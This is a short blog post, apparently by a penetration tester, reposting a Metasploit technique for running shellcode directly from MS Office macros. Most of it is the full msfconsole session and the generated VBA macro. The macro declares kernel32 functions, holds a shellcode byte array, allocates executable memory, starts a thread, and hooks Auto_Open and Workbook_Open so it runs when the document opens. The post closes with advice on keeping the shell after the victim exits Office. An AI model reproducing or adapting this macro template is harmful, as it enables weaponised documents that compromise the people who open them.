scriptjunkie recently had a post on Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec msf payload(exec) > set CMD calc CMD => calc msf payload(exec) > set EXITFUNC thread EXITFUNC => thread msf payload(exec) > generate -t vba #If Vba7 Then Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr #Else Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long #EndIf Sub Auto_Open() Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long #If Vba7 Then Dim Xlbufvetp As LongPtr #Else Dim Xlbufvetp As Long #EndIf Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _ 139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _ 13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _ 116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _ 214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _ 36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _ 139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _ 235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _ 224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _ 187,71,19,114,111,106,0,83,255,213,99,97,108,99,0) Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40) For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp) Wyzayxya = Hyeyhafxp(Zolde) Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1) Next Zolde Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0) End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.